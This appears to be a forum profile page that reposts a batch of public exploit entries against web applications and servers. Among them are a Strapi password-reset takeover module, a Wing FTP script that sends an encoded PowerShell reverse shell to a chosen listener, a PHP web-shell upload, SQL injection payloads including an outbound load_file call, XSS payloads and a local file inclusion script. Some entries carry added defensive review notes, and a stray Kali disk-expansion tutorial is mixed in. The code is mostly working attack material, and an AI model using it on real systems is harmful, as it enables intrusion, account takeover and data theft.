
Everything posted by HireHackking
-
Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit)
# Review notes (defensive). The `run` method below sends `code => {'$gt' => 0}`
# to /admin/auth/reset-password: the reset-token field is a JSON object carrying
# a query-operator key instead of a string, which is the CVE-2019-18818 issue
# the reference points at (presumably the lookup of the stored reset code then
# matches on the operator rather than on an exact token — confirm against the
# Strapi source for 3.0.0-beta.17.4).
# Mitigation: the reset handler must reject any non-string `code` value and
# compare it to the stored token as an exact string. `check` keys only on
# `strapiVersion == '3.0.0-beta.17.4'` read from GET /admin/init, so any other
# version is reported Safe without further probing, and /admin/init itself
# discloses the exact version to unauthenticated clients.
# Detection: unauthenticated POST /admin/auth/reset-password requests whose JSON
# `code` field is an object or contains `$`-prefixed operator keys; a 200
# response carrying a `jwt` after such a request is the success indicator this
# module prints, together with a password change on an admin account that was
# not preceded by a reset e-mail.
# NOTE(review): the failure branch calls `fail_with(Failure::NoAccess"...")`
# with no comma between its two arguments, so that path does not parse.
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Auxiliary Rank = NormalRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit)", 'Description' => %q{ This exploit module abuses the mishandling of password reset in JSON for Strapi CMS version 3.0.0-beta.17.4 to change the password of a privileged user. }, 'License' => MSF_LICENSE, 'Author' => [ 'WackyH4cker' ], 'References' => [ [ 'URL', 'https://vulners.com/cve/CVE-2019-18818' ] ], 'Platform' => 'linux', 'Targets' => [ [ 'Strapi 3.0.0-beta-17.4', {} ] ], 'Payload' => '', 'Privileged' => true, 'DisclosureDate' => "", 'DefaultOptions' => { 'SSL' => 'False', 'RPORT' => 80, }, 'DefaultTarget' => 0 )) register_options [ OptString.new('NEW_PASSWORD', [true, 'New password for user Admin']) ] end def check res = send_request_raw({ 'uri' => '/admin/init' }) version = JSON.parse(res.body) if version["data"]["strapiVersion"] == '3.0.0-beta.17.4' return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end def run json_body = { 'code' => {'$gt' => 0}, 'password' => datastore['NEW_PASSWORD'], 'passwordConfirmation' => datastore['NEW_PASSWORD'] } res = send_request_cgi({ 'method' => 'POST', 'uri' => '/admin/auth/reset-password', 'ctype' => 'application/json', 'data' => JSON.generate(json_body) }) print_status("Changing password...") json_format = JSON.parse(res.body) jwt = json_format['jwt'] if res.code == 200 print_good("Password changed successfully!") print_good("USER: admin") print_good("PASSWORD: #{datastore['NEW_PASSWORD']}") print_good("JWT: #{jwt}") else fail_with(Failure::NoAccess"Could not change admin user password") end end end
-
Hospital Management System 4.0 - 'multiple' SQL Injection
# Title: Hospital Management System 4.0 - 'multiple' SQL Injection # Author: nu11secur1ty # Date: 02.06.2022 # Vendor: https://github.com/kishan0725 # Software: https://github.com/kishan0725/Hospital-Management-System # CVE-2022-24263 ## Description: The Hospital Management System v4.0 is suffering from Multiple SQL-Injections via three parameters in function.php, contact.php, and func3.php applications. The attacker can be receiving the all information from the system by using this vulnerability, and also the malicious actor can use sensitive information from the customers of this system. WARNING: If this is in some external domain, or some subdomain, or internal, this will be extremely dangerous! Status: CRITICAL [+] Payloads: --- Parameter: txtName (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: txtName=821761' AND (SELECT 9346 FROM (SELECT(SLEEP(3)))HJGv) AND 'xkCZ'='xkCZ&txtEmail=xstxPhYW@https://github.com/kishan0725/Hospital-Management-System&txtPhone=813-439-23'+(select load_file('\\\\k0lnu24kl14z5bxcoo5tj7z4bvho5fz3q6ey1qpf.https://github.com/kishan0725/Hospital-Management-System\\hgq'))+'&btnSubmit=Send Message&txtMsg=441931 --- ------------------------------------------- --- Parameter: #1* ((custom) POST) Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) Payload: email=riiVAqjG@https://github.com/kishan0725/Hospital-Management-System'+(select-2936) OR 1 GROUP BY CONCAT(0x7162706271,(SELECT (CASE WHEN (5080=5080) THEN 1 ELSE 0 END)),0x716b767a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login Type: UNION query Title: MySQL UNION query (random number) - 1 column Payload: email=riiVAqjG@https://github.com/kishan0725/Hospital-Management-System'+(select-2730) UNION ALL SELECT 
8185,8185,CONCAT(0x7162706271,0x5777534a4b68716f6d4270614362544c4954786a4f774b6852586b47694945644a70757262644c52,0x716b767a71),8185,8185,8185,8185,8185#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login --- ------------------------------------------- --- Parameter: #1* ((custom) POST) Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) Payload: username3=CHnDaCTc'+(select-2423) OR 1 GROUP BY CONCAT(0x71626a6271,(SELECT (CASE WHEN (5907=5907) THEN 1 ELSE 0 END)),0x716b766b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login Type: UNION query Title: MySQL UNION query (random number) - 1 column Payload: username3=CHnDaCTc'+(select-3282) UNION ALL SELECT CONCAT(0x71626a6271,0x446c68526a796c4475676e54774d6b617a6977736855756f63796f43686d706c637877534a557076,0x716b766b71),4829,4829,4829,4829#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login --- ## Reproduce: https://github.com/nu11secur1ty/CVE-mitre/edit/main/2022/CVE-2022-24263
-
Wing FTP Server 4.3.8 - Remote Code Execution (RCE) (Authenticated)
# Review notes (defensive). The script logs in with the supplied admin
# credentials (POST /admin_loginok.html, then reads the UIDADMIN cookie) and
# POSTs `command=os.execute('powershell -Encodedcommand ...')` to
# /admin_lua_script.html, i.e. the admin Lua console executes an OS command in
# the server's context. The header lists affected versions as <=4.3.8 and
# Windows as the tested platform; whether that console is a documented admin
# feature or a defect is not stated on the page.
# Mitigation: restrict the admin web interface to trusted networks, run the
# service under a low-privileged account so that commands issued through the
# console do not inherit elevated rights, and keep admin credentials out of
# command lines (they are taken from argv here and would land in shell history).
# Detection: POST requests to /admin_lua_script.html whose body contains
# os.execute or `powershell -Encodedcommand`; a powershell.exe child process
# spawned by the Wing FTP server process; the fixed "Googlebot" User-Agent on
# admin_* URLs.
# NOTE(review): success is inferred from a 0.1 s read timeout
# (`except requests.exceptions.ReadTimeout`), so a slow or failed request
# prints the same message, and `r.cookies['UIDADMIN']` is read without checking
# that the login actually succeeded.
# Exploit Title: Wing FTP Server - Authenticated RCE # Date: 02/06/2022 # Exploit Author: notcos # Credit: Credit goes to the initial discoverer of this exploit, Alex Haynes. # Vendor Homepage: https://www.wftpserver.com/ # Software Link: https://www.wftpserver.com/download/WingFtpServer.exe # Version: <=4.3.8 # Tested on: Windows # !/usr/bin/python3 import requests import sys import base64 import urllib.parse # Get command line arguments if len(sys.argv) != 7: print("This exploit will invoke a nishang tcp reverse shell on the target. Start your listener before executing.") print("Usage: %s <TARGET> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT> <USER> <PASSWORD>" % sys.argv[0]) print("Example: %s 0.0.0.0 8000 127.0.0.1 9001 notcos coolpass" % sys.argv[0]) exit(1) else: target = sys.argv[1] targetport = sys.argv[2] localip = sys.argv[3] localport = sys.argv[4] user = sys.argv[5] password = sys.argv[6] print(''' .--. / ,~a`-, \ \_.-"` ) ( __ __ .__ ____ __________ _________ ___________ ,/ ."\ / \ / \|__| ____ / ___\ \______ \\\\_ ___ \ \_ _____/ / ( | \ \/\/ /| | / \ / /_/ > | _// \ \/ | __)_ / ) ; \ / | || | \ \___ / | | \\\\ \____ | \\ / / / \__/\ / |__||___| //_____/ |____|_ / \______ //_______ / ,/_."` /` \/ \/ \/ \/ \/ /_/\ |___ `~~~~~` ''') # Create the login request url = 'http://' + target + ':' + targetport + '/admin_loginok.html' data = ('username=' + user + '&password=' + password + '&username_val=' + user + '&password_val=' + password + '&su' 'bmit_btn=%2bLogin%2b') headers = { "User-Agent": "Googlebot" } # Send the POST request to log in and save the cookie r = requests.post(url, headers=headers, data=data) cookie = 'UIDADMIN=' + r.cookies['UIDADMIN'] print('Login successful - Cookie: ' + cookie) url = "http://" + target + ":" + targetport + "/admin_lua_script.html" headers = { "User-Agent": "Googlebot", "Cookie": cookie, } # Base64 encode a nishang reverse tcp shell one liner and then url encode it nish = ("$client = New-Object System.Net.Sockets.TCPClient(\"" 
+ localip + "\"," + localport + ");$stream = $client" ".GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$d" "ata = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1" " | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCI" "I).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()") encodedStr = str(base64.b64encode(nish.encode('UTF-16LE')), "UTF8") urlpayload = urllib.parse.quote(encodedStr, safe='+') finalload = "command=os.execute('powershell -Encodedcommand " + urlpayload + "')" # Send the reverse shell payload try: r = requests.post(url, headers=headers, data=finalload, timeout=0.1) except requests.exceptions.ReadTimeout: print("The payload has been sent. Check your listener.") pass
-
WordPress Plugin International Sms For Contact Form 7 Integration V1.2 - Cross Site Scripting (XSS)
# Exploit Title: WordPress Plugin International Sms For Contact Form 7 Integration V1.2 - Cross Site Scripting (XSS) # Date: 2022-02-04 # Author: Milad karimi # Software Link: https://wordpress.org/plugins/cf7-international-sms-integration/ # Version: 1.2 # Tested on: Windows 11 # CVE: N/A 1. Description: This plugin creates a cf7-international-sms-integration from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting. 2. Proof of Concept: http://localhost/cf7-international-sms-integration/includes/admin/class-sms-log-display.php?page=<script>alert("test")</script>
-
WordPress Plugin Security Audit 1.0.0 - Stored Cross Site Scripting (XSS)
# Exploit Title: WordPress Plugin Security Audit 1.0.0 - Stored Cross Site Scripting (XSS) # Date: 2022-01-26 # Exploit Author: Shweta Mahajan # Vendor Homepage: https://en-gb.wordpress.org/plugins/titan-labs-security-audit/ # Software Link: https://en-gb.wordpress.org/plugins/titan-labs-security-audit/ # Tested on Windows # CVE: CVE-2021-24901 # Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24901 https://wpscan.com/vulnerability/9c315404-b66a-448c-a3b7-367a37b53435 How to reproduce vulnerability: 1. Install Latest WordPress 2. Install and activate Titan-labs-security-audit Version 1.0.0 3. Navigate to Security Audit settings >> enter the payload into 'Data Id'. 4. Enter JavaScript payload which is mentioned below "><img src=x onerror=confirm(1)> 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload gets executed successfully and we'll get a pop-up.
-
Title: Expand the disk for Kali Linux
When Kali was installed, a 40G disk was allocated, but as more and more files are stored in Kali, that disk is no longer enough. So how do we expand the Kali disk? First, let's look at the remaining space on this machine: df. As you can see, disk usage has reached 100%. Allocate space to Kali: open the virtual machine settings, click Add below - Add Hard Drive. Here I am adding 10G of capacity. Execute the following command in the terminal: fdisk -l. Here we see the 10G hard disk we just added. Next we need to partition /dev/sda; execute the command fdisk /dev/sda. Format the partition: mke2fs -t ext4 /dev/sda. Mount the disk: at this point I want to mount the 10G of capacity at the /root directory, so execute the command mount /dev/sda /root. But this only takes effect once, that is, our mount will be lost after the PC is restarted, so we can set it in the configuration file. Modify the configuration file; the format is as follows: UUID, mount directory, file system format, permanent, whether to back up, whether to self-check. The UUID is available through blkid. vim /etc/fstab. In this way, we have completed the expansion of the disk.
-
Wordpress Plugin Simple Job Board 2.9.3 - Local File Inclusion
# Review notes (defensive). After a normal wp-login.php login the script
# requests wp-admin/post.php?post=application_id&action=edit&sjb_file=<file_path>
# and saves the response body; presumably the plugin reads the path given in the
# `sjb_file` query parameter and returns the file's contents to a logged-in user
# (CVE-2020-35749, version 2.9.3 per the header). The role required for this is
# not stated on the page — confirm before rating severity.
# Mitigation: the plugin must resolve `sjb_file` inside its own uploads
# directory and reject absolute paths and `..` segments; update to a release
# after 2.9.3 (the fixed version is not given here).
# Detection: wp-admin/post.php requests with `sjb_file=` values that are
# absolute paths (e.g. /etc/passwd as in the usage example) or contain `../`;
# responses from that endpoint carrying non-WordPress file content.
# NOTE(review): the raw response is written to output.txt unconditionally, even
# when the login or the fetch failed, and the 3 s sleep serves no purpose.
# Exploit Title: Wordpress Plugin Simple Job Board 2.9.3 - Local File Inclusion # Date: 2022-02-06 # Exploit Author: Ven3xy # Vendor Homepage: https://wordpress.org/plugins/simple-job-board/ # Software Link: https://downloads.wordpress.org/plugin/simple-job-board.2.9.3.zip # Version: 2.9.3 # Tested on: Ubuntu 20.04 LTS # CVE : CVE-2020-35749 import requests import sys import time class color: HEADER = '\033[95m' IMPORTANT = '\33[35m' NOTICE = '\033[33m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' WARNING = '\033[93m' RED = '\033[91m' END = '\033[0m' UNDERLINE = '\033[4m' LOGGING = '\33[34m' color_random=[color.HEADER,color.IMPORTANT,color.NOTICE,color.OKBLUE,color.OKGREEN,color.WARNING,color.RED,color.END,color.UNDERLINE,color.LOGGING] def banner(): run = color_random[6]+'''\nY88b / 888~~ 888 ,e, d8 Y88b / 888-~88e 888___ Y88b / 888-~88e 888 e88~-_ " _d88__ Y88b e / 888 888b ____ 888 Y88b/ 888 888b 888 d888 i 888 888 Y88bd8b/ 888 8888 888 Y88b 888 8888 888 8888 | 888 888 Y88Y8Y 888 888P 888 /Y88b 888 888P 888 Y888 ' 888 888 Y Y 888-_88" 888___ / Y88b 888-_88" 888 "88_-~ 888 "88_/ 888 888 \n''' run2 = color_random[2]+'''\t\t\t(CVE-2020-35749)\n''' run3 = color_random[4]+'''\t{ Coded By: Ven3xy | Github: https://github.com/M4xSec/ }\n\n''' print(run+run2+run3) if (len(sys.argv) != 5): banner() print("[!] 
Usage : ./wp-exploit.py <target_url> <file_path> <USER> <PASS>") print("[~] Example : ./wp-exploit.py http://target.com:8080/wordpress/ /etc/passwd admin admin") exit() else: banner() fetch_path = sys.argv[2] print (color_random[5]+"[+] Trying to fetch the contents from "+fetch_path) time.sleep(3) target_url = sys.argv[1] usernamex = sys.argv[3] passwordx = sys.argv[4] print("\n") login = target_url+"wp-login.php" wp_path = target_url+'wp-admin/post.php?post=application_id&action=edit&sjb_file='+fetch_path username = usernamex password = passwordx with requests.Session() as s: headers = { 'Cookie':'wordpress_test_cookie=WP Cookie check', 'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15' } post_data={ 'log':username, 'pwd':password, 'wp-submit':'Log In','redirect_to':wp_path, 'testcookie':'1' } s.post(login, headers=headers, data=post_data) resp = s.get(wp_path) out_file = open("output.txt", "w") print(resp.text, file=out_file) out_file.close() print(color_random[4]+resp.text) out = color_random[5]+"\n[+] Output Saved as: output.txt\n" print(out)
-
Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated) # Date: 2022-02-08 # Exploit Author: Juli Agarwal(@agarwaljuli) # Vendor Homepage: https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code # Version: 1.0 # Tested on: XAMPP, Kali Linux Description – The application suffers from a remote code execution in the admin panel. An authenticated attacker can upload a web-shell php file in profile page to achieve remote code execution. POC:- ========== # Request: ========== POST /erms/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: en-US,en;q=0.5 X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------37791356766765055891341961306 Content-Length: 1004 Origin: http://localhost Connection: close Referer: http://localhost/erms/admin/?page=user Cookie: PHPSESSID=22f0bd65ef694041af3177057e7fbd5a -----------------------------37791356766765055891341961306 Content-Disposition: form-data; name="id" 1 -----------------------------37791356766765055891341961306 Content-Disposition: form-data; name="firstname" Adminstrator -----------------------------37791356766765055891341961306 Content-Disposition: form-data; name="lastname" Admin -----------------------------37791356766765055891341961306 Content-Disposition: form-data; name="username" admin -----------------------------37791356766765055891341961306 Content-Disposition: form-data; name="password" -----------------------------37791356766765055891341961306 Content-Disposition: form-data; name="img"; filename="shell.php" Content-Type: application/x-php <html> <body> <b>Remote code execution: </b><br><pre> <?php 
if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> </pre> </body> </html> -----------------------------37791356766765055891341961306— ================ # Webshell access: ================ # Webshell access via: POC: http://localhost/erms/uploads/1644334740_shell.php?cmd=id # Webshell response: Remote code execution: uid=1(daemon) gid=1(daemon) groups=1(daemon)
-
WordPress Plugin CP Blocks 1.0.14 - Stored Cross Site Scripting (XSS)
# Exploit Title: WordPress Plugin CP Blocks 1.0.14 - Stored Cross Site Scripting (XSS) # Date: 2022-02-02 # Exploit Author: Shweta Mahajan # Vendor Homepage: https://wordpress.org/plugins/cp-blocks/ # Software Link: https://wordpress.org/plugins/cp-blocks/ # Tested on Windows # CVE: CVE-2022-0448 # Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0448 https://wpscan.com/vulnerability/d4ff63ee-28e6-486e-9aa7-c878b97f707c How to reproduce vulnerability: 1. Install Latest WordPress 2. Install and activate CP Blocks Version 1.0.14 3. Navigate to CP Blocks - License >> enter the payload into 'License ID'. 4. Enter JavaScript payload which is mentioned below "><script>alert(0)</script> 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload gets executed successfully and we'll get a pop-up.
-
Cain & Abel 4.9.56 - Unquoted Service Path
# Exploit Title: Cain & Abel 4.9.56 - Unquoted Service Path # Exploit Author: Aryan Chehreghani # Date: 2022-02-08 # Software Link: https://www.malavida.com/en/soft/cain-and-abel # Version: 4.9.56 # Tested on: Windows 10 x64 # PoC SERVICE_NAME: Abel TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Cain\Abel64.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Abel DEPENDENCIES : SERVICE_START_NAME : LocalSystem
-
AtomCMS v2.0 - SQLi
# Exploit Title: AtomCMS v2.0 - SQLi # Date: 08/02/2022 # Exploit Author: Luca Cuzzolin aka czz78 # Vendor Homepage: https://github.com/thedigicraft/Atom.CMS # Version: v2.0 # Category: Webapps # Tested on: Debian linux # CVE : CVE-2022-24223 ==================================================== # PoC : SQLi : http://127.0.0.1/Atom.CMS/admin/login.php POST /Atom.CMS/admin/login.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: it,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 35 Origin: http://127.0.0.1 Connection: keep-alive Referer: http://127.0.0.1/Atom.CMS/admin/login.php Cookie: PHPSESSID=tqfebdu4kn9qj7g6qpa91j9859 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 email=test%40test.com&password=1234 Vulnerable Payload : Parameter: email (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: email=test@test.com' AND (SELECT 5613 FROM (SELECT(SLEEP(5)))JnLZ) AND 'pROE'='pROE&password=1234 Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: email=test@test.com' UNION ALL SELECT NULL,CONCAT(0x717a767a71,0x65557a784e446152424b63724b5a737062464a4267746c70794d5976484c484a5365634158734975,0x71627a7871),NULL,NULL,NULL,NULL-- -&password=1234 Vector: UNION ALL SELECT NULL,[QUERY],NULL,NULL,NULL,NULL-- - --- ====================================================
-
Exam Reviewer Management System 1.0 - ‘id’ SQL Injection
# Exploit Title: Exam Reviewer Management System 1.0 - ‘id’ SQL Injection # Date: 2022-02-18 # Exploit Author: Juli Agarwal(@agarwaljuli) # Vendor Homepage: https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code # Version: 1.0 # Tested on: Windows 10/Kali Linux Description – The ‘id’ parameter in Exam Reviewer Management System web application is vulnerable to SQL Injection Vulnerable URL - http://127.0.0.1/erms/?p=take_exam&id=1 POC:- --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: p=take_exam&id=1' AND 4755=4755 AND 'VHNu'='VHNu Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: p=take_exam&id=1' OR (SELECT 8795 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(8795=8795,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'MCXA'='MCXA Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: p=take_exam&id=1' AND (SELECT 2206 FROM (SELECT(SLEEP(5)))AhEo) AND 'vqGg'='vqGg--- *SQLMAP COMMAND* *# sqlmap -u "127.0.0.1/erms/?p=take_exam&id=1 <http://127.0.0.1/erms/?p=take_exam&id=1>" -p id --dbs --level 3*
-
Hospital Management Startup 1.0 - 'Multiple' SQLi
# Exploit Title: Hospital Management Startup 1.0 - 'loginid' SQLi # Exploit Author: nu11secur1ty # Date: 02.10.2022 # Vendor: https://github.com/kabirkhyrul # Software: https://github.com/kabirkhyrul/HMS # CVE-2022-23366 # Description: The loginid and password parameters from Hospital Management Startup 1.0 appear to be vulnerable to SQL injection attacks. The attacker can retrieve all information from the administrator account of the system and he can use the information for malicious purposes! WARNING: If this is in some external domain, or some subdomain, or internal, this will be extremely dangerous! Status: CRITICAL [+] Payloads: ```mysql --- Parameter: loginid (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: loginid=hackedpassword=hacked' or '6681'='6681' AND (SELECT 1959 FROM (SELECT(SLEEP(3)))PuyC) AND 'sDHP'='sDHP&rememberme=on&submit=Login --- ``` # Reproduce: https://github.com/nu11secur1ty/CVE-mitre/edit/main/2022/CVE-2022-23366
-
Home Owners Collection Management System 1.0 - Account Takeover (Unauthenticated)
# Exploit Title: Home Owners Collection Management System 1.0 - Account Takeover (Unauthenticated) # Date: 9/02/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: XAMPP, Linux Home Owners Collection Management System is vulnerable to unauthenticated account takeover. An attacker can takeover any registered 'Staff' user account by just sending below POST request By changing the the "id", "firstname", "lastname" , "username" , "password" ,"type" parameters #Steps to Reproduce 1. Send the below POST request by changing "id", "firstname", "lastname" , "username" , "password" ,"type" parameters. 2. Go to http://localhost/hocms/admin/ and Log in to the user account by changed username and password ============================================== POST /hocms/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------8012296389370411172619882391 Content-Length: 899 Origin: http://localhost Connection: close Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju -----------------------------8012296389370411172619882391 Content-Disposition: form-data; name="id" -----------------------------8012296389370411172619882391 Content-Disposition: form-data; name="firstname" hi -----------------------------8012296389370411172619882391 Content-Disposition: form-data; name="lastname" test -----------------------------8012296389370411172619882391 Content-Disposition: form-data; name="username" saud -----------------------------8012296389370411172619882391 Content-Disposition: form-data; name="password" saud -----------------------------8012296389370411172619882391 
Content-Disposition: form-data; name="type" 1 -----------------------------8012296389370411172619882391 Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream -----------------------------8012296389370411172619882391--
-
Home Owners Collection Management System 1.0 - 'id' Blind SQL Injection
# Exploit Title: Home Owners Collection Management System 1.0 - 'id' Blind SQL Injection # Date: 9/02/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: XAMPP, Windows 10 # Vulnerable Code line 68 in file "/hocms/admin/members/view_member.php" $collection = $conn->query("SELECT * FROM `collection_list` where member_id = '{$id}' order by date(date_collected) desc"); # Sqlmap command: sqlmap -u 'http://localhost/hocms/admin/?id=0&page=members/view_member' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch # Output: Parameter: id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=0' AND (SELECT 9980 FROM (SELECT(SLEEP(5)))POvo)-- OyKE&page=members/view_member
-
WordPress Plugin Secure Copy Content Protection and Content Locking 2.8.1 - SQL-Injection (Unauthenticated)
# Review notes (defensive). The script does no requests of its own: it builds a
# sqlmap command line against
# wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)*&type=json
# and hands it to os.system. The injection point is the `sccp_id[]` array value,
# and the description above states the action is reachable without
# authentication in plugin versions before 2.8.2 (CVE-2021-24931, CWE-89).
# Mitigation: update the plugin to 2.8.2 or later; the action's handler must
# pass sccp_id through $wpdb->prepare() rather than concatenating it, and should
# carry a capability check and nonce if the export is meant to be admin-only.
# Detection: admin-ajax.php requests with action=ays_sccp_results_export_file
# from unauthenticated clients, sccp_id[] values containing SQL syntax, and
# sqlmap's default User-Agent or the burst of near-identical requests typical of
# automated injection.
# NOTE(review): `exploitcode` is a single shell string assembled from argv and
# input() and executed with os.system, so shell metacharacters in those values
# are interpreted by the local shell; none of the argparse options is
# required=True, so a missing -T/-P/-U leaves None and the string concatenation
# raises TypeError.
# Exploit Title: WordPress Plugin Secure Copy Content Protection and Content Locking 2.8.1 - SQL-Injection (Unauthenticated) # Date 08.02.2022 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://ays-pro.com/ # Software Link: https://downloads.wordpress.org/plugin/secure-copy-content-protection.2.8.1.zip # Version: < 2.8.2 # Tested on: Ubuntu 20.04 # CVE: CVE-2021-24931 # CWE: CWE-89 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24931/README.md ''' Description: The Secure Copy Content Protection and Content Locking WordPress plugin before 2.8.2 does not escape the sccp_id parameter of the ays_sccp_results_export_file AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an SQL injection. ''' banner = ''' .--. .-..-. .--. .---. .--. .---. ,-. .---. .-. .--. .----. ,-. : .--': :: :: .--' `--. :: ,. :`--. :.' : `--. : .'.': .; :`-- ;.' : : : : :: :: `; _____ ,',': :: : ,',' `: : _____ ,','.'.'_`._, : .' ' `: : : :__ : `' ;: :__:_____:.'.'_ : :; :.'.'_ : ::_____:.'.'_ :_ ` : : : _`,`. : : `.__.' `.,' `.__.' :____;`.__.':____; :_; :____; :_: :_:`.__.' 
:_; [+] Copy Content Protection and Content Locking - SQL Injection [@] Developed by Ron Jost (Hacker5preme) ''' print(banner) import argparse from datetime import datetime import os # User-Input: my_parser = argparse.ArgumentParser(description= 'Copy Content Protection and Content Locking SQL-Injection (unauthenticated)') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH # Exploit: print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) print('[*] Payload for SQL-Injection:') exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)*&type=json" ' print(' Sqlmap options:') print(' -a, --all Retrieve everything') print(' -b, --banner Retrieve DBMS banner') print(' --current-user Retrieve DBMS current user') print(' --current-db Retrieve DBMS current database') print(' --passwords Enumerate DBMS users password hashes') print(' --tables Enumerate DBMS database tables') print(' --columns Enumerate DBMS database table column') print(' --schema Enumerate DBMS schema') print(' --dump Dump DBMS database table entries') print(' --dump-all Dump all DBMS databases tables entries') retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ') exploitcode = exploitcode_url + retrieve_mode + ' --answers="follow=Y" --batch -v 0' os.system(exploitcode) print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
-
Home Owners Collection Management System 1.0 - Remote Code Execution (RCE) (Authenticated)
